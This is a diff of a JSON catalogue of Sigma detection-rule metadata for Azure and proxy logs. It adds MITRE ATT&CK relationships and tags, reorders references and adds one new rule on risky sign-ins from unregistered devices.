@@ -56693,9 +73185,19 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_creating_number_of_resources_detection.yml" ], "tags": [ + "attack.persistence", "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d2d901db-7a75-45a1-bc39-0cbf00812192", "value": "Number Of Resource Creation Or Deployment Activities" }, @@ -56788,9 +73290,20 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_firewall_policy_modified_or_deleted.yml" ], "tags": [ - "attack.impact" + "attack.impact", + "attack.defense_evasion", + "attack.t1562.007" ] }, + "related": [ + { + "dest-uuid": "77532a55-c283-4cd2-bc5d-2d0b65e9d88c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "83c17918-746e-4bd9-920b-8e098bf88c23", "value": "Azure Network Firewall Policy Modified or Deleted" }, @@ -56864,6 +73377,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "72af37e2-ec32-47dc-992b-bc288a2708cb", "value": "Azure New CloudShell Created" }, @@ -56937,6 +73459,15 @@ "attack.t1548" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "26e7c5e2-6545-481e-b7e6-050143459635", "value": "CA Policy Removed by Non Approved Actor" }, 
@@ -56961,6 +73492,15 @@ "attack.t1578.003" ] }, + "related": [ + { + "dest-uuid": "70857657-bd0b-4695-ad3e-b13f92cac1b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "48739819-8230-4ee3-a8ea-e0289d1fb0ff", "value": "Azure Active Directory Hybrid Health AD FS Service Delete" }, @@ -57034,6 +73574,15 @@ "attack.t1548" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0922467f-db53-4348-b7bf-dee8d0d348c6", "value": "New CA Policy by Non-approved Actor" }, @@ -57059,6 +73608,22 @@ "attack.t1526" ] }, + "related": [ + { + "dest-uuid": "8f104855-e5b7-4077-b1f5-bc3103b41abe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e24fcba8-2557-4442-a139-1ee2f2e784db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "35b781cc-1a08-4a5a-80af-42fd7c315c6b", "value": "Discovery Using AzureHound" }, @@ -57084,6 +73649,15 @@ "attack.t1548" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "50a3c7aa-ec29-44a4-92c1-fce229eef6fc", "value": "CA Policy Updated by Non Approved Actor" }, @@ -57130,9 +73704,18 @@ "tags": [ "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1078" + "attack.t1078.004" ] }, + "related": [ + { + "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "db6c06c4-bf3b-421c-aa88-15672b88c743", "value": "Changes To PIM Settings" }, 
@@ -57181,6 +73764,15 @@ "attack.t1578" ] }, + "related": [ + { + "dest-uuid": "144e007b-e638-431d-a894-45d90c54ab90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "288a39fc-4914-4831-9ada-270e9dc12cb4", "value": "Azure Active Directory Hybrid Health AD FS New Server" }, @@ -57229,6 +73821,15 @@ "attack.t1078.004" ] }, + "related": [ + { + "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5496ff55-42ec-4369-81cb-00f417029e25", "value": "Multifactor Authentication Interrupted" }, @@ -57249,9 +73850,19 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_guest_to_member.yml" ], "tags": [ - "attack.t1078" + "attack.privilege_escalation", + "attack.t1078.004" ] }, + "related": [ + { + "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8dee7a0d-43fd-4b3c-8cd1-605e189d195e", "value": "User State Changed From Guest To Member" }, @@ -57301,6 +73912,15 @@ "attack.t1078.004" ] }, + "related": [ + { + "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e40f4962-b02b-4192-9bfe-245f7ece1f99", "value": "Multifactor Authentication Denied" }, @@ -57325,6 +73945,15 @@ "attack.t1484" ] }, + "related": [ + { + "dest-uuid": "ebb42bbe-62d7-47d7-a55f-3b08b61d792d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aeaef14c-e5bf-4690-a9c8-835caad458bd", "value": "PIM Alert Setting Changes To Disabled" }, 
@@ -57345,9 +73974,19 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_granting_permission_detection.yml" ], "tags": [ - "attack.t1098" + "attack.persistence", + "attack.t1098.003" ] }, + "related": [ + { + "dest-uuid": "2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a622fcd2-4b5a-436a-b8a2-a4171161833c", "value": "Granting Of Permissions To An Account" }, @@ -57364,11 +74003,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml" ], "tags": [ @@ -57400,6 +74039,15 @@ "attack.credential_access" ] }, + "related": [ + { + "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0055ad1f-be85-4798-83cf-a6da17c993b3", "value": "Application URI Configuration Changes" }, 
@@ -57417,11 +74065,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_role_access.yml" ], "tags": [ @@ -57456,6 +74104,15 @@ "attack.t1552.001" ] }, + "related": [ + { + "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "80eeab92-0979-4152-942d-96749e11df40", "value": "Azure Keyvault Key Modified or Deleted" }, @@ -57528,6 +74185,15 @@ "attack.credential_access" ] }, + "related": [ + { + "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1b45b0d1-773f-4f23-aedc-814b759563b1", "value": "Application AppID Uri Configuration Changes" }, 
@@ -57545,11 +74211,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_container_registry_created_or_deleted.yml" ], "tags": [ @@ -57577,9 +74243,18 @@ ], "tags": [ "attack.initial_access", - "attack.t1078" + "attack.t1078.004" ] }, + "related": [ + { + "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "908655e0-25cf-4ae1-b775-1c8ce9cf43d8", "value": "Login to Disabled Account" }, @@ -57606,6 +74281,15 @@ "attack.t1562.001" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "225d8b09-e714-479c-a0e4-55e6f29adf35", "value": "Azure Kubernetes Events Deleted" }, @@ -57623,7 +74307,6 @@ "logsource.product": "azure", "refs": [ "https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/", - "https://attack.mitre.org/techniques/T1098/003/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml" ], "tags": [ 
@@ -57631,6 +74314,15 @@ "attack.t1098.003" ] }, + "related": [ + { + "dest-uuid": "2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ebbeb024-5b1d-4e16-9c0c-917f86c708a7", "value": "User Added to an Administrator's Azure AD Role" }, @@ -57648,18 +74340,28 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", "https://kubernetes.io/docs/concepts/workloads/controllers/job/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cronjob.yml" ], "tags": [ "attack.persistence", + "attack.t1053.003", "attack.privilege_escalation", "attack.execution" ] }, + "related": [ + { + "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1c71e254-6655-42c1-b2d6-5e4718d7fc0a", "value": "Azure Kubernetes CronJob" }, 
@@ -57724,11 +74426,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml" ], "tags": [ 
@@ -57803,12 +74505,47 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_firewall_modified_or_deleted.yml" ], "tags": [ - "attack.impact" + "attack.impact", + "attack.defense_evasion", + "attack.t1562.004" ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "512cf937-ea9b-4332-939c-4c2c94baadcd", "value": "Azure Firewall Modified or Deleted" }, + { + "description": "Detects risky authencaition from a non AD registered device without MFA being required.", + "meta": { + "author": "Harjot Singh, '@cyb3rjy0t'", + "creation_date": "2023/01/10", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "572b12d4-9062-11ed-a1eb-0242ac120002", + "value": "Suspicious SignIns From A Non Registered Device" + }, { "description": "Identifies when DNS zone is modified or deleted.", "meta": { @@ -57827,9 +74564,19 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_dns_zone_modified_or_deleted.yml" ], "tags": [ - "attack.impact" + "attack.impact", + "attack.t1565.001" ] }, + "related": [ + { + "dest-uuid": "1cfcb312-b8d7-47a4-b560-4b16cc677292", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "af6925b0-8826-47f1-9324-337507a0babd", "value": "Azure DNS Zone Modified or Deleted" }, 
@@ -57879,6 +74626,15 @@ "attack.t1484" ] }, + "related": [ + { + "dest-uuid": "ebb42bbe-62d7-47d7-a55f-3b08b61d792d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9494bff8-959f-4440-bbce-fb87a208d517", "value": "Changes to Device Registration Policy" }, @@ -57899,9 +74655,18 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_only_single_factor_auth_required.yml" ], "tags": [ - "attack.t1078" + "attack.t1078.004" ] }, + "related": [ + { + "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "28eea407-28d7-4e42-b0be-575d5ba60b2c", "value": "Azure AD Only Single Factor Authentication Required" }, @@ -57948,9 +74713,18 @@ "tags": [ "attack.persistence", "attack.privilege_escalation", - "attack.t1078" + "attack.t1078.004" ] }, + "related": [ + { + "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f7b5b004-dece-46e4-a4a5-f6fd0e1c6947", "value": "Privileged Account Creation" }, @@ -57998,6 +74772,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "665e2d43-70dc-4ccc-9d27-026c9dd7ed9c", "value": "User Removed From Group With CA Policy Modification Access" }, @@ -58039,7 +74822,6 @@ "logsource.product": "azure", "refs": [ "https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates", - "https://attack.mitre.org/techniques/T1556/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_disabled.yml" ], "tags": [ 
@@ -58047,6 +74829,15 @@ "attack.t1556" ] }, + "related": [ + { + "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7ea78478-a4f9-42a6-9dcd-f861816122bf", "value": "Disabled MFA to Bypass Authentication Mechanisms" }, @@ -58174,6 +74965,15 @@ "attack.t1552.001" ] }, + "related": [ + { + "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b831353c-1971-477b-abb6-2828edc3bca1", "value": "Azure Keyvault Secrets Modified or Deleted" }, @@ -58191,11 +74991,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_network_policy_change.yml" ], "tags": [ 
@@ -58220,17 +75020,27 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml" ], "tags": [ - "attack.impact" + "attack.impact", + "attack.t1531" ] }, + "related": [ + { + "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "12d027c3-b48c-4d9d-8bb6-a732200034b2", "value": "Azure Kubernetes Service Account Modified or Deleted" }, @@ -58255,6 +75065,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6ec820f2-e963-4801-9127-d8b2dce4d31b", "value": "APT User Agent" }, @@ -58279,6 +75098,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "894a8613-cf12-48b3-8e57-9085f54aa0c3", "value": "Suspicious Base64 User Agent" }, 
@@ -58304,6 +75132,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b923f7d6-ac89-4a50-a71a-89fb846b4aa8", "value": "Empire UserAgent URI Combo" }, @@ -58320,8 +75157,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://twitter.com/jhencinski/status/1102695118455349248", "https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/", + "https://twitter.com/jhencinski/status/1102695118455349248", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml" ], "tags": [ @@ -58333,6 +75170,22 @@ "attack.s0190" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9eb68894-7476-4cd6-8752-23b51f5883a7", "value": "Bitsadmin to Uncommon TLD" }, @@ -58359,6 +75212,15 @@ "attack.g0010" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7857f021-007f-4928-8b2c-7aedbe64bb82", "value": "Turla ComRAT" }, @@ -58383,6 +75245,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fb502828-2db0-438e-93e6-801c7548686d", "value": "Chafer Malware URL Pattern" }, 
@@ -58399,9 +75270,9 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw", "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/", + "https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_exchange_owassrf_poc_exploitation.yml" ], "tags": [ @@ -58409,6 +75280,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fdd7e904-7304-4616-a46a-e32f917c4be4", "value": "OWASSRF Exploitation Attempt Using Public POC - Proxy" }, @@ -58433,6 +75313,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f", "value": "Exploit Framework User Agent" }, @@ -58459,6 +75348,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e09aed7a-09e0-4c9a-90dd-f0d52507347e", "value": "Windows WebDAV User Agent" }, 
@@ -58485,6 +75383,22 @@ "attack.t1568" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "7bd9c723-2f78-4309-82c5-47cad406572b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "195c1119-ef07-4909-bb12-e66f5e07bf3c", "value": "Download from Suspicious Dyndns Hosts" }, @@ -58510,6 +75424,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c9b33401-cc6a-4cf6-83bb-57ddcb2407fc", "value": "CobaltStrike Malleable OneDrive Browsing Traffic Profile" }, @@ -58534,6 +75457,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7195a772-4b3f-43a4-a210-6a003d65caa1", "value": "Suspicious User Agent" }, @@ -58551,8 +75483,8 @@ "logsource.product": "No established product", "refs": [ "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", - "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_telegram_api.yml" ], "tags": [ 
@@ -58562,6 +75494,22 @@ "attack.t1102.002" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b494b165-6634-483d-8c47-2026a6c52372", "value": "Telegram API Access" }, @@ -58588,8 +75536,24 @@ "attack.t1204.002" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b5de2919-b74a-4805-91a7-5049accbaefe", - "value": "Download EXE from Suspicious TLD" + "value": "Download From Suspicious TLD - Whitelist" }, { "description": "Detects suspicious user agent strings used by malware in proxy logs", @@ -58604,9 +75568,9 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents", "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", + "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents", "http://www.botopedia.org/search?searchword=scan&searchphrase=all", "https://perishablepress.com/blacklist/ua-2013.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_malware.yml" 
@@ -58616,6 +75580,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5c84856b-55a5-45f1-826f-13f37250cf4e", "value": "Malware User Agent" }, @@ -58643,6 +75616,22 @@ "attack.s0190" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8ccd35a2-1c7c-468b-b568-ac6cdf80eec3", "value": "Bitsadmin to Uncommon IP Server Address" }, @@ -58659,8 +75648,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone", "https://rclone.org/", + "https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_rclone.yml" ], "tags": [ @@ -58668,6 +75657,15 @@ "attack.t1567.002" ] }, + "related": [ + { + "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2c03648b-e081-41a5-b9fb-7d854a915091", "value": "Rclone Activity via Proxy" }, @@ -58693,6 +75691,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1ddf4596-1908-43c9-add2-1d2c2fcc4797", "value": "Potential OWASSRF Exploitation Attempt - Proxy" }, 
